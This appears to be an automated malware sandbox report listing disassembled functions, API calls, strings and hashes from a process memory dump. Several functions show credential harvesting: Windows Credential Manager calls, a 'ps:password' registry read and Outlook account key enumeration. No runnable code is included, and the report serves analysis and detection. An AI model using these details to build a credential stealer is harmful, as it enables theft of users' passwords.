                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                      • API String ID: 2449869053-232097475
                                                                                                                                                                                                                      • Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                                                      • Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403E83 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EBB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403F04
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00403F20
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403F57
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403F88
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00403F1A
                                                                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
                                                                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
                                                                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                      • API String ID: 113626815-1670831295
                                                                                                                                                                                                                      • Opcode ID: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                                                      • Instruction ID: 806bb3af6c01162091129d7dbd14bcfdd9389eda619bfd821539a1a2e53cd61a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 553187B2944218BAEB10EB95CC41FDF77ACEB44305F1040ABF609A3141DE789F988B69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004092CB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004092EC
                                                                                                                                                                                                                      • LoadMenuA.USER32(?,?), ref: 004092FA
                                                                                                                                                                                                                        • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                                                                                                                                                                                                        • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                                                                                                                                                                                                        • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                                                                                                                                                                                                        • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 00409318
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040935C
                                                                                                                                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 004093CD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                      • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                      • Opcode ID: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                                                      • Instruction ID: 4880027b7f24484a0daf4b70c4ca19663393d93293db39a52c89ae2e2b3c84be
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0121E472500248BBEB21AF509C45EEF3768FB4A715F14007BFE01A11D2D6B85D548F59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F928 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 667068680-3953557276
                                                                                                                                                                                                                      • Opcode ID: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                                                      • Instruction ID: d70ca51da7794723d6fdd3b52e2ca510f6325bc6d96353a7ae51ff6a4d6706bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F03674641716BEE7219B35EC41F6B2DA8B786B817150037E404F1295EBBCD406CBEE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004045D6 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                      • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                      • Opcode ID: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                                                      • Instruction ID: e667573ab02a3a36113e5811d7d9d25958220871e4fc9ad39742c7b975dc30ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32012CB49007009ADB30AF759809B46BAE0EF9A705B224C2FE295A3691E77ED440CF49
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F177 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 0040F2A1
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                      • String ID: Creds$ps:password
                                                                                                                                                                                                                      • API String ID: 551151806-1872227768
                                                                                                                                                                                                                      • Opcode ID: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                                                      • Instruction ID: 6090246ec9a09cf2b7bf1ee2c59d5b558b26d9adbf6fbfd3eb8a6f02fd62f1f0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7413ABA900209AFDF21DF95DC44EEFBBBCEF49704F0000B6F905E2151DA349A548B64
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404217 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 0040424C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004042B7
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004042CA
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004042D8
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004042EC
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040430D
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040431E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                      • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                      • Opcode ID: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                                      • Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004094A2 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004094BA
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004094CA
                                                                                                                                                                                                                        • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                                                                                                                                                                                                        • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                                                                                                                                                                                                        • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00409512
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040952E
                                                                                                                                                                                                                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                                                                                                                                                                                                        • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                      • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                      • Opcode ID: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                                      • Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004106AD Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                      • API String ID: 714388716-318151290
                                                                                                                                                                                                                      • Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                                      • Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C750 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                                                                                      • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                                                                                        • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                                                                                        • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                                                                                        • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                                                                                      • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1416211542-0
                                                                                                                                                                                                                      • Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                                      • Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040DEF0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                      • Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                                      • Instruction ID: 5d143ff0da15214bab7bb06cf5d8f907292877c2fd7590e182fa264530f008e8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 934185726053059FE724DEA5C881F9673E8EF04304F10497BF64AE3281DB78F9588B59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402C4F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402C8F
                                                                                                                                                                                                                        • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                                                                                        • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                                                                                        • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                                                                                        • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                      • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                      • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                      • Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                                      • Instruction ID: 1b5601e0499ef747dd56af052f35eddfd4da5329eef37c5f4f36e35d9cf9c12c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0831507290011CBAEF11EA91CC46FEF777CAF04305F0404BABA04B2192E7B59F948B64
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040FA44 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040FA5C
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                                        • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                                                                                                                                                                                                        • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                                                                                                                                                                                                        • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040FABA
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040FAC5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FAA1
                                                                                                                                                                                                                        • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                                                                                                                                                                                                        • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FAE9
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040FB04
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040FB0F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                      • API String ID: 912701516-1821301763
